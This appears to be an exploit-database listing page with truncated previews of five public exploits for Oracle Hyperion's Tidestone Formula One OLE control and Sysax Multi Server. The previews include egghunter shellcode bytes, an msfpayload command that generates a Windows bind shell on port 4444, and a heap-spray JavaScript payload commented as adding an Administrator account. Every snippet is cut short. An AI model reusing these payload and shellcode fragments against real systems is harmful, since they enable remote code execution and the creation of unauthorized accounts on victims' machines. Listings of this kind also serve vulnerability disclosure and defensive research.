Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow

No description provided by source. !-- Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One WorkBook OLE Control TTF16 6.3.5 Build 1 SetDevNames Remote Heap Overflow poc 99% stable,IE-no-dep. I think this control can be carried by other products, however 6.1 seems not vulnerable A...

Sysax Multi Server 5.50 Create Folder BOF

No description provided by source. !/usr/bin/python Title: Sysax Multi Server 5.50 Create Folder BOF Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit and Server 2003 SP2 32bitNo DEP Date Discovered: January 13, 2012 Vendor Contacted: January 15, 2012 Vendor Response: January 16, 2012 Vendor...

Sysax 5.53 - SSH 'Username' Remote Buffer Overflow Remote Code Execution (Egghunter)

!/usr/bin/python Title: Sysax " sys.exit1 host = sys.argv1 port = intsys.argv2 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05" "\x5a\x74\xef\xb8\x44\x4e\x57\x50\x8b\xfa\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7" msfpayload windows/shellbindtcp LPORT=4444 R | msfencode -e -e...

Sysax Multi Server 5.50 - Create Folder Buffer Overflow

!/usr/bin/python Title: Sysax Multi Server 5.50 Create Folder BOF Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit and Server 2003 SP2 32bitNo DEP Date Discovered: January 13, 2012 Vendor Contacted: January 15, 2012 Vendor Response: January 16, 2012 Vendor Fix: Version 5.52 released on Januar...

Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook

Exploit for windows platform in category remote exploits var finalsize = 1200; var final = ''; var heap = null; var curr = 0; function x heap = new heapLib.ie0x20000; var heapspray = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu...